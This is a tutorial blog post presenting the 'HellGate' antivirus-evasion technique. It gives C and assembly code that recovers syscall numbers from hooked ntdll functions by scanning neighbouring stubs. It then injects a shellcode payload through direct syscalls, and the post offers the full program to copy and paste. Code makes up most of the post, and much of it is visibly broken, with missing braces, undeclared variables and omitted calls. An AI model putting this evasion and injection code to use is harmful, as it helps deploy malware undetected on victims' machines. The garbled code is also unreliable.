HellGate Technique on AV Bypass

Hi Friends,

Yet another simple tutorial post regarding on how to bypass AV detection during payload injection. As mentioned in my previous post that one of the way to bypass the detection is to unhook the AV API calls in each win32 or ntdll, We call it a classic method of AV bypass.

I would like to share another methods that is called HellGate that was found by to researcher smelly__vx (@RtlMateusz) and am0nsec (@am0nsec). Their technique does not need unhooking method but by calling the syscall ID directly (See the image below)

We can see that the syscall id is actually linear hence we can use that to calculate the syscal id the API that was hooked by AV

Hooked vs Normal API

Take a look at the below image, We can see that every API function which is started with E9 means this function is hooked by the AV where API function which start with 4C means this is not hooked by AV.

What hellsgate is trying to achieve is whenever you want to use the API that has been hooked (e.g. ZwCreateThreadEx) where the Systemcall ID has been removed by the AV and overwriten with jump to AV, You can traverse down or up to the neighboring syscall such as ZwCreateTimer by moving down 32 bytes. If the neighboring API function is not being hooked by AV then you can get the systemcall ID which is C2 and calculate with how much you have been traversing down or up.

// if hooked check the neighborhood to find clean syscall
			if (*((PBYTE)pFunctionAddress) == 0xe9) {

				for (WORD idx = 1; idx <= 500; idx++) {
					// check neighboring syscall down
					if (*((PBYTE)pFunctionAddress + idx * DOWN) == 0x4c
						&& *((PBYTE)pFunctionAddress + 1 + idx * DOWN) == 0x8b
						&& *((PBYTE)pFunctionAddress + 2 + idx * DOWN) == 0xd1
						&& *((PBYTE)pFunctionAddress + 3 + idx * DOWN) == 0xb8
						&& *((PBYTE)pFunctionAddress + 6 + idx * DOWN) == 0x00
						&& *((PBYTE)pFunctionAddress + 7 + idx * DOWN) == 0x00) {
						BYTE high = *((PBYTE)pFunctionAddress + 5 + idx * DOWN);
						BYTE low = *((PBYTE)pFunctionAddress + 4 + idx * DOWN);
						pVxTableEntry->wSystemCall = (high << 8) | low - idx;
						printf("API %s Down how many times : %d \n", pczFunctionName, idx);
						return TRUE;
					// check neighboring syscall up
					if (*((PBYTE)pFunctionAddress + idx * UP) == 0x4c
						&& *((PBYTE)pFunctionAddress + 1 + idx * UP) == 0x8b
						&& *((PBYTE)pFunctionAddress + 2 + idx * UP) == 0xd1
						&& *((PBYTE)pFunctionAddress + 3 + idx * UP) == 0xb8
						&& *((PBYTE)pFunctionAddress + 6 + idx * UP) == 0x00
						&& *((PBYTE)pFunctionAddress + 7 + idx * UP) == 0x00) {
						BYTE high = *((PBYTE)pFunctionAddress + 5 + idx * UP);
						BYTE low = *((PBYTE)pFunctionAddress + 4 + idx * UP);
						pVxTableEntry->wSystemCall = (high << 8) | low + idx;
						printf("API %s Up how many times : %d \n", pczFunctionName, idx);
						return TRUE;

We can see in the above code that there are two If conditions to check if the function is not being hooked. The function that is started with 4C and followed by 8BD1 (MOV R10, RCX). We need to get the syscall MOV RAX,<Syscall> the circled one. We can se that the Syscall is actually in sequece where in the picture mentioned C3, C2 and so fort. To get the Syscall ID, we can use this code pVxTableEntry->wSystemCall = (high << 8) | low + idx; or pVxTableEntry->wSystemCall = (high << 8) | low – idx;

if (*((PBYTE)pFunctionAddress + idx * DOWN) == 0x4c
						&& *((PBYTE)pFunctionAddress + 1 + idx * DOWN) == 0x8b
						&& *((PBYTE)pFunctionAddress + 2 + idx * DOWN) == 0xd1
						&& *((PBYTE)pFunctionAddress + 3 + idx * DOWN) == 0xb8
						&& *((PBYTE)pFunctionAddress + 6 + idx * DOWN) == 0x00
						&& *((PBYTE)pFunctionAddress + 7 + idx * DOWN) == 0x00)

below is the full C code to get the Syscall

BOOL GetVxTableEntry(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PVX_TABLE_ENTRY pVxTableEntry) {
	PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfFunctions);
	PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNames);
	PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNameOrdinals);

	for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
		PCHAR pczFunctionName = (PCHAR)((PBYTE)pModuleBase + pdwAddressOfNames[cx]);
		PVOID pFunctionAddress = (PBYTE)pModuleBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];

		//djb2 is the function to hash the ntdll API function name
		if (djb2(pczFunctionName) == pVxTableEntry->dwHash) {
			pVxTableEntry->pAddress = pFunctionAddress;

			// First opcodes should be :
			//    MOV R10, RCX
			//    MOV RAX, <syscall>
			if (*((PBYTE)pFunctionAddress) == 0x4c
				&& *((PBYTE)pFunctionAddress + 1) == 0x8b
				&& *((PBYTE)pFunctionAddress + 2) == 0xd1  
				&& *((PBYTE)pFunctionAddress + 3) == 0xb8
				&& *((PBYTE)pFunctionAddress + 6) == 0x00
				&& *((PBYTE)pFunctionAddress + 7) == 0x00) {
				BYTE high = *((PBYTE)pFunctionAddress + 5);
				BYTE low = *((PBYTE)pFunctionAddress + 4);
				pVxTableEntry->wSystemCall = (high << 8) | low;
				return TRUE;

			// if hooked check the neighborhood to find clean syscall
			if (*((PBYTE)pFunctionAddress) == 0xe9) {

				for (WORD idx = 1; idx <= 500; idx++) {
					// check neighboring syscall down
					if (*((PBYTE)pFunctionAddress + idx * DOWN) == 0x4c
						&& *((PBYTE)pFunctionAddress + 1 + idx * DOWN) == 0x8b
						&& *((PBYTE)pFunctionAddress + 2 + idx * DOWN) == 0xd1
						&& *((PBYTE)pFunctionAddress + 3 + idx * DOWN) == 0xb8
						&& *((PBYTE)pFunctionAddress + 6 + idx * DOWN) == 0x00
						&& *((PBYTE)pFunctionAddress + 7 + idx * DOWN) == 0x00) {
						BYTE high = *((PBYTE)pFunctionAddress + 5 + idx * DOWN);
						BYTE low = *((PBYTE)pFunctionAddress + 4 + idx * DOWN);
						pVxTableEntry->wSystemCall = (high << 8) | low - idx;
						printf("API %s Down how many times : %d \n", pczFunctionName, idx);
						return TRUE;
					// check neighboring syscall up
					if (*((PBYTE)pFunctionAddress + idx * UP) == 0x4c
						&& *((PBYTE)pFunctionAddress + 1 + idx * UP) == 0x8b
						&& *((PBYTE)pFunctionAddress + 2 + idx * UP) == 0xd1
						&& *((PBYTE)pFunctionAddress + 3 + idx * UP) == 0xb8
						&& *((PBYTE)pFunctionAddress + 6 + idx * UP) == 0x00
						&& *((PBYTE)pFunctionAddress + 7 + idx * UP) == 0x00) {
						BYTE high = *((PBYTE)pFunctionAddress + 5 + idx * UP);
						BYTE low = *((PBYTE)pFunctionAddress + 4 + idx * UP);
						pVxTableEntry->wSystemCall = (high << 8) | low + idx;
						printf("API %s Up how many times : %d \n", pczFunctionName, idx);
						return TRUE;

				return FALSE;
	return TRUE;

What is next?

Ofcourse you will ask what is the next after you are able to find the exact syscall. The next move is to execute the syscall by using the magic HellsGate and HellDescent assembly code

; Hell's Gate
; Dynamic system call invocation 
; by smelly__vx (@RtlMateusz) and am0nsec (@am0nsec)

	wSystemCall DWORD 000h

	HellsGate PROC
		mov wSystemCall, 000h
		mov wSystemCall, ecx
	HellsGate ENDP

	HellDescent PROC
		mov r10, rcx
		mov eax, wSystemCall

	HellDescent ENDP

The above code need to be called from the C code of our malware.

Call for NtAllocateVirtualMemory

SIZE_T sDataSize = sizeof(payload);
	status = HellDescent((HANDLE)-1, &lpAddress, 0, &sDataSize, MEM_COMMIT, PAGE_READWRITE);

Call for NtProtectVirtual

ULONG ulOldProtect = 0;
	HellsGate(pVxTable->NtProtectVirtual  Memory.wSystemCall);
	status = HellDescent((HANDLE)-1, &lpAddress, &sDataSize, PAGE_EXECUTE_READ, &ulOldProtect);

Call for NtCreateThreadEx

	status = HellDescent(&hHostThread, 0x1FFFFF, NULL, (HANDLE)-1, (LPTHREAD_START_ROUTINE)lpAddress, NULL, FALSE, NULL, NULL, NULL, NULL);

Payload is successfully injected even with the AV hook. AV does not detect the malicious payload

Below is the full code that you can copy paste to your Visual Studio

#pragma once
#include <Windows.h>
#include "structs.h"

#include <stdio.h>
#include <wincrypt.h>
#pragma comment (lib, "crypt32.lib")

#define UP -32
#define DOWN 32

// MessageBox shellcode - 64-bit
unsigned char payload[] = 

unsigned char key[] = { 0xc0, 0xa6, 0x8b, 0x1b, 0x59, 0x92, 0xcf, 0x6b, 0xef, 0x96, 0xe7, 0xd7, 0x33, 0x65, 0xda, 0x84 };

unsigned int payload_len = sizeof(payload);

  VX Tables
typedef struct _VX_TABLE_ENTRY {
	PVOID   pAddress;
	DWORD64 dwHash;
	WORD    wSystemCall;

typedef struct _VX_TABLE {
	VX_TABLE_ENTRY NtAllocateVirtualMemory;
	VX_TABLE_ENTRY NtProtectVirtualMemory;
	VX_TABLE_ENTRY NtCreateThreadEx;
	VX_TABLE_ENTRY NtWaitForSingleObject;

  Function prototypes.
PTEB RtlGetThreadEnvironmentBlock();
BOOL GetImageExportDirectory(
	_In_ PVOID                     pModuleBase,
	_Out_ PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory
BOOL GetVxTableEntry(
	_In_ PVOID pModuleBase,
	_In_ PIMAGE_EXPORT_DIRECTORY pImageExportDirectory,
	_In_ PVX_TABLE_ENTRY pVxTableEntry
BOOL Payload(
	_In_ PVX_TABLE pVxTable
PVOID VxMoveMemory(
	_Inout_ PVOID dest,
	_In_    const PVOID src,
	_In_    SIZE_T len

  External functions' prototype.
extern VOID HellsGate(WORD wSystemCall);
extern HellDescent();

INT wmain() {
//int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {

	PTEB pCurrentTeb = RtlGetThreadEnvironmentBlock();
	PPEB pCurrentPeb = pCurrentTeb->ProcessEnvironmentBlock;
	if (!pCurrentPeb || !pCurrentTeb || pCurrentPeb->OSMajorVersion != 0xA)
		return 0x1;

	// Get NTDLL module 
	PLDR_DATA_TABLE_ENTRY pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10);

	// Get the EAT of NTDLL
	if (!GetImageExportDirectory(pLdrDataEntry->DllBase, &pImageExportDirectory) || pImageExportDirectory == NULL)
		return 0x01;

	VX_TABLE Table = { 0 };
	Table.NtAllocateVirtualMemory.dwHash = 0xf5bd373480a6b89b;
	if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtAllocateVirtualMemory))
		return 0x1;

	Table.NtCreateThreadEx.dwHash = 0x64dc7db288c5015f;
	if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtCreateThreadEx))
		return 0x1;

	Table.NtProtectVirtualMemory.dwHash = 0x858bcb1046fb6a37;
	if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtProtectVirtualMemory))
		return 0x1;

	Table.NtWaitForSingleObject.dwHash = 0xc6a2fa174e551bcb;
	if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtWaitForSingleObject))
		return 0x1;
	return 0x00;

PTEB RtlGetThreadEnvironmentBlock() {
#if _WIN64
	return (PTEB)__readgsqword(0x30);
	return (PTEB)__readfsdword(0x16);

DWORD64 djb2(PBYTE str) {
	DWORD64 dwHash = 0x7734773477347734;
	INT c;

	while (c = *str++)
		dwHash = ((dwHash << 0x5) + dwHash) + c;

	return dwHash;

BOOL GetImageExportDirectory(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory) {
	// Get DOS header
	if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
		return FALSE;

	// Get NT headers
	PIMAGE_NT_HEADERS pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pModuleBase + pImageDosHeader->e_lfanew);
	if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE) {
		return FALSE;

	// Get the EAT
	*ppImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)pModuleBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
	return TRUE;

BOOL GetVxTableEntry(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PVX_TABLE_ENTRY pVxTableEntry) {
	PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfFunctions);
	PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNames);
	PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNameOrdinals);

	for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
		PCHAR pczFunctionName = (PCHAR)((PBYTE)pModuleBase + pdwAddressOfNames[cx]);
		PVOID pFunctionAddress = (PBYTE)pModuleBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];

		//djb2 is the function to hash the ntdll API function name
		if (djb2(pczFunctionName) == pVxTableEntry->dwHash) {
			pVxTableEntry->pAddress = pFunctionAddress;

			// First opcodes should be :
			//    MOV R10, RCX
			//    MOV RAX, <syscall>
			if (*((PBYTE)pFunctionAddress) == 0x4c
				&& *((PBYTE)pFunctionAddress + 1) == 0x8b
				&& *((PBYTE)pFunctionAddress + 2) == 0xd1  
				&& *((PBYTE)pFunctionAddress + 3) == 0xb8
				&& *((PBYTE)pFunctionAddress + 6) == 0x00
				&& *((PBYTE)pFunctionAddress + 7) == 0x00) {
				BYTE high = *((PBYTE)pFunctionAddress + 5);
				BYTE low = *((PBYTE)pFunctionAddress + 4);
				pVxTableEntry->wSystemCall = (high << 8) | low;
				return TRUE;

			// if hooked check the neighborhood to find clean syscall
			if (*((PBYTE)pFunctionAddress) == 0xe9) {

				for (WORD idx = 1; idx <= 500; idx++) {
					// check neighboring syscall down
					if (*((PBYTE)pFunctionAddress + idx * DOWN) == 0x4c
						&& *((PBYTE)pFunctionAddress + 1 + idx * DOWN) == 0x8b
						&& *((PBYTE)pFunctionAddress + 2 + idx * DOWN) == 0xd1
						&& *((PBYTE)pFunctionAddress + 3 + idx * DOWN) == 0xb8
						&& *((PBYTE)pFunctionAddress + 6 + idx * DOWN) == 0x00
						&& *((PBYTE)pFunctionAddress + 7 + idx * DOWN) == 0x00) {
						BYTE high = *((PBYTE)pFunctionAddress + 5 + idx * DOWN);
						BYTE low = *((PBYTE)pFunctionAddress + 4 + idx * DOWN);
						pVxTableEntry->wSystemCall = (high << 8) | low - idx;
						printf("API %s Down how many times : %d \n", pczFunctionName, idx);
						return TRUE;
					// check neighboring syscall up
					if (*((PBYTE)pFunctionAddress + idx * UP) == 0x4c
						&& *((PBYTE)pFunctionAddress + 1 + idx * UP) == 0x8b
						&& *((PBYTE)pFunctionAddress + 2 + idx * UP) == 0xd1
						&& *((PBYTE)pFunctionAddress + 3 + idx * UP) == 0xb8
						&& *((PBYTE)pFunctionAddress + 6 + idx * UP) == 0x00
						&& *((PBYTE)pFunctionAddress + 7 + idx * UP) == 0x00) {
						BYTE high = *((PBYTE)pFunctionAddress + 5 + idx * UP);
						BYTE low = *((PBYTE)pFunctionAddress + 4 + idx * UP);
						pVxTableEntry->wSystemCall = (high << 8) | low + idx;
						printf("API %s Up how many times : %d \n", pczFunctionName, idx);
						return TRUE;

				return FALSE;

	return TRUE;

BOOL Payload(PVX_TABLE pVxTable) {
	NTSTATUS status = 0x00000000;

	HANDLE u32 = LoadLibraryA("User32.dll");

	printf("Table address vx_tab: %p\n HellsGate Assembly function address : %p\n HellDescent Assembly function address : %p\n", pVxTable, HellsGate, HellDescent); getchar();

	// Allocate memory for the shellcode
	PVOID lpAddress = NULL;
	//SIZE_T sDataSize = sizeof(shellcode);
	SIZE_T sDataSize = sizeof(payload);
	status = HellDescent((HANDLE)-1, &lpAddress, 0, &sDataSize, MEM_COMMIT, PAGE_READWRITE);

	printf("sc: %p | sc_mem: %p\n", payload, lpAddress); getchar();

	// Write Memory
	//VxMoveMemory(lpAddress, shellcode, sizeof(shellcode));
	VxMoveMemory(lpAddress, payload, sizeof(payload)); 

	// Change page permissions
	ULONG ulOldProtect = 0;
	status = HellDescent((HANDLE)-1, &lpAddress, &sDataSize, PAGE_EXECUTE_READ, &ulOldProtect);

	printf("Start the payload injection\n"); getchar();

	// Create thread
	status = HellDescent(&hHostThread, 0x1FFFFF, NULL, (HANDLE)-1, (LPTHREAD_START_ROUTINE)lpAddress, NULL, FALSE, NULL, NULL, NULL, NULL);


	// Wait for 1 seconds
	Timeout.QuadPart = -10000000;
	status = HellDescent(hHostThread, FALSE, &Timeout);

	return TRUE;

PVOID VxMoveMemory(PVOID dest, const PVOID src, SIZE_T len) {
	char* d = dest;
	const char* s = src;
	if (d < s)
		while (len--)
			*d++ = *s++;
	else {
		char* lasts = s + (len - 1);
		char* lastd = d + (len - 1);
		while (len--)
			*lastd-- = *lasts--;
	return dest;

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